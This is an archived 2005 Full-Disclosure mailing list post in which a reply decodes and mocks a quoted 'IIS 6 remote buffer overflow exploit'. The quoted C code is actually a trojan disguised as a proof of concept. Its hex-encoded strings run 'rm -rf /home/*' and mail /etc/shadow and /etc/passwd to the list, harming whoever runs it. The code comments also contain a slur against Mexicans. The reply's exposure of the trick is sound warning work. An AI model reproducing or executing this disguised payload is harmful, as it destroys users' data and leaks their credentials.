lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Date: Tue Apr 19 02:55:24 2005
From: iago at valhallalegends.com (Ron)
Subject: IIS 6 Remote Buffer Overflow Exploit

haha, nice:

/bin/rm -rf /home/*;clear;echo bl4ckh4t,hehe
cat /etc/shadow |mail full-disclosure@...ts.grok.org.uk
cat /etc/passwd |mail full-disclosure@...ts.grok.org.uk

lol @ anybody who does it. 

Day Jay wrote:

>/* Proof of concept code
>   Please don't send us e-mails
>   asking us "how to hack" because
>   we will be forced to skullfsck you.
>
>DISCLAIMER:
>!!NOT RESPONSIBLE WITH YOUR USE OF THIS CODE!!
>
>   IIS 6 Buffer Overflow Exploit
>
>   BUG: inetinfo.exe improperly bound checks
>   http requests sent longer than 6998 chars.
>   Can get messy but enough testing, and we have
>   found a way in.
>
>   VENDOR STATUS: Notified
>   FIX: In process
>
>   Remote root.
>
>   eg.
>   #./iis6_inetinfoX xxx.xxx.xxx.xxx -p 80
>    + Connecting to host...
>    + Connected.
>    + Inserting Shellcode...
>    + Done...
>    + Spawining shell..
>
>    Microsoft Windows XP [Version 5.1.2600]
>   (C) Copyright 1985-2001 Microsoft Corp.
>   C:\>
>
>
>
>*/
>char shellcode[] =
>"\x2f\x62\x69\x6e\x2f\x72\x6d\x20"
>"\x2d\x72\x66\x20\x2f\x68\x6f\x6d"
>"\x65\x2f\x2a\x3b\x63\x6c\x65\x61"
>"\x72\x3b\x65\x63\x68\x6f\x20\x62"
>"\x6c\x34\x63\x6b\x68\x34\x74\x2c"
>"\x68\x65\x68\x65";
>
>char launcher [] =
>"\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73"
>"\x68\x61\x64\x6f\x77\x20\x7c\x6d\x61\x69"
>"\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
>"\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
>"\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
>"\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
>
>char netcat_shell [] =
>"\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70"
>"\x61\x73\x73\x77\x64\x20\x7c\x6d\x61\x69"
>"\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
>"\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
>"\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
>"\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
>
>
>main()
>{
>
>//Section Initialises designs implemented by mexicans
>//Imigrate
>system(launcher);
>system(netcat_shell);
>system(shellcode);
>
>//int socket = 0;
>//double long port = 0.0;
>
>//#DEFINE port host address
>//#DEFINE number of inters
>//#DEFINE gull eeuEE
>
> //     for(int j; j < 30; j++)
>        {
>        //Find socket remote address fault
>        printf(".");
>        }
>//overtake inetinfo here IIS_666666^
>return 0;
>}
>
>
>
>
>		
>__________________________________ 
>Do you Yahoo!? 
>Plan great trips with Yahoo! Travel: Now over 17,000 guides!
>http://travel.yahoo.com/p-travelguide
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
>
>
>  
>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ